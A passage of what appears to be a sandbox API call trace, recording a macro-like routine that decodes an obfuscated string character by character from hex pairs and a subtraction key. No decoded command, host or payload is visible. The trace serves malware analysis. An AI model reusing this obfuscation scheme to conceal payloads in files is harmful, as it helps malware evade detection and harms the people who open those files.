[0175.117] free (_Block=0x11f50080) [0175.117] VarBstrCat (in: bstrLeft="&H", bstrRight="e3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.117] GetUserDefaultLCID () returned 0x409 [0175.117] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.117] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.118] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.118] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.118] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.118] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.118] GetUserDefaultLCID () returned 0x409 [0175.118] malloc (_Size=0xa0) returned 0x11f50080 [0175.118] free (_Block=0x11f50080) [0175.118] VarBstrCat (in: bstrLeft="&H", bstrRight="b3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.118] GetUserDefaultLCID () returned 0x409 [0175.118] VarI2FromStr (in: strIn="&Hb3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.118] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0175.118] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.119] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.119] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.119] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.119] GetUserDefaultLCID () returned 0x409 [0175.119] malloc (_Size=0xa0) returned 0x11f50080 [0175.119] free (_Block=0x11f50080) [0175.119] VarBstrCat (in: bstrLeft="&H", bstrRight="bc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.119] GetUserDefaultLCID () returned 0x409 [0175.119] VarI2FromStr (in: strIn="&Hbc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.119] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.120] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.120] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.120] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.120] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.120] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.120] GetUserDefaultLCID () returned 0x409 [0175.120] malloc (_Size=0xa0) returned 0x11f50080 [0175.120] free (_Block=0x11f50080) [0175.120] VarBstrCat (in: bstrLeft="&H", bstrRight="e2", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.120] GetUserDefaultLCID () returned 0x409 [0175.120] VarI2FromStr (in: strIn="&He2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.121] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.121] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.121] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.121] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.121] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.122] GetUserDefaultLCID () returned 0x409 [0175.122] malloc (_Size=0xa0) returned 0x11f50080 [0175.122] free (_Block=0x11f50080) [0175.122] VarBstrCat (in: bstrLeft="&H", bstrRight="c5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.122] GetUserDefaultLCID () returned 0x409 [0175.122] VarI2FromStr (in: strIn="&Hc5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.122] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0175.123] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.123] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.123] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.123] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.123] GetUserDefaultLCID () returned 0x409 [0175.123] malloc (_Size=0xa0) returned 0x11f50080 [0175.123] free (_Block=0x11f50080) [0175.123] VarBstrCat (in: bstrLeft="&H", bstrRight="89", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.123] GetUserDefaultLCID () returned 0x409 [0175.123] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.123] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0175.125] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.125] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.126] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.126] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.126] GetUserDefaultLCID () returned 0x409 [0175.126] malloc (_Size=0xa0) returned 0x11f50080 [0175.126] free (_Block=0x11f50080) [0175.126] VarBstrCat (in: bstrLeft="&H", bstrRight="de", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.126] GetUserDefaultLCID () returned 0x409 [0175.126] VarI2FromStr (in: strIn="&Hde", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.126] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0175.126] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.126] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.127] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.127] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.127] GetUserDefaultLCID () returned 0x409 [0175.127] malloc (_Size=0xa0) returned 0x11f50080 [0175.127] free (_Block=0x11f50080) [0175.127] VarBstrCat (in: bstrLeft="&H", bstrRight="c0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.127] GetUserDefaultLCID () returned 0x409 [0175.127] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.127] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="j") returned 1 [0175.127] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.127] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.128] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.128] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.128] GetUserDefaultLCID () returned 0x409 [0175.128] malloc (_Size=0xa0) returned 0x11f50080 [0175.128] free (_Block=0x11f50080) [0175.128] VarBstrCat (in: bstrLeft="&H", bstrRight="c3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.128] GetUserDefaultLCID () returned 0x409 [0175.128] VarI2FromStr (in: strIn="&Hc3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.128] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="P") returned 1 [0175.130] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.130] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.130] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.130] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.130] GetUserDefaultLCID () returned 0x409 [0175.130] malloc (_Size=0xa0) returned 0x11f50080 [0175.130] free (_Block=0x11f50080) [0175.130] VarBstrCat (in: bstrLeft="&H", bstrRight="c1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.130] GetUserDefaultLCID () returned 0x409 [0175.131] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.131] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.131] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.131] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.131] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.131] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.131] GetUserDefaultLCID () returned 0x409 [0175.131] malloc (_Size=0xa0) returned 0x11f50080 [0175.131] free (_Block=0x11f50080) [0175.131] VarBstrCat (in: bstrLeft="&H", bstrRight="c0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.131] GetUserDefaultLCID () returned 0x409 [0175.132] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.132] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.132] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.132] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.132] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.132] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.132] GetUserDefaultLCID () returned 0x409 [0175.132] malloc (_Size=0xa0) returned 0x11f50080 [0175.132] free (_Block=0x11f50080) [0175.132] VarBstrCat (in: bstrLeft="&H", bstrRight="a8", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.132] GetUserDefaultLCID () returned 0x409 [0175.133] VarI2FromStr (in: strIn="&Ha8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.133] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.133] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.133] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.133] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.133] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.133] GetUserDefaultLCID () returned 0x409 [0175.133] malloc (_Size=0xa0) returned 0x11f50080 [0175.133] free (_Block=0x11f50080) [0175.133] VarBstrCat (in: bstrLeft="&H", bstrRight="9f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.133] GetUserDefaultLCID () returned 0x409 [0175.133] VarI2FromStr (in: strIn="&H9f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.134] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0175.134] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.134] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.134] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.134] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.134] GetUserDefaultLCID () returned 0x409 [0175.134] malloc (_Size=0xa0) returned 0x11f50080 [0175.134] free (_Block=0x11f50080) [0175.134] VarBstrCat (in: bstrLeft="&H", bstrRight="ca", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.134] GetUserDefaultLCID () returned 0x409 [0175.134] VarI2FromStr (in: strIn="&Hca", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.135] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.135] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.135] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.135] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.135] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.135] GetUserDefaultLCID () returned 0x409 [0175.135] malloc (_Size=0xa0) returned 0x11f50080 [0175.135] free (_Block=0x11f50080) [0175.135] VarBstrCat (in: bstrLeft="&H", bstrRight="be", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.135] GetUserDefaultLCID () returned 0x409 [0175.135] VarI2FromStr (in: strIn="&Hbe", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.135] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0175.136] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.136] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] GetUserDefaultLCID () returned 0x409 [0175.136] malloc (_Size=0xa0) returned 0x11f50080 [0175.136] free (_Block=0x11f50080) [0175.136] VarBstrCat (in: bstrLeft="&H", bstrRight="d3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.136] GetUserDefaultLCID () returned 0x409 [0175.136] VarI2FromStr (in: strIn="&Hd3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.136] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0175.136] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.136] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.144] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.144] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.144] GetUserDefaultLCID () returned 0x409 [0175.144] malloc (_Size=0xa0) returned 0x11f50080 [0175.144] free (_Block=0x11f50080) [0175.144] VarBstrCat (in: bstrLeft="&H", bstrRight="e4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.144] GetUserDefaultLCID () returned 0x409 [0175.144] VarI2FromStr (in: strIn="&He4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.145] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 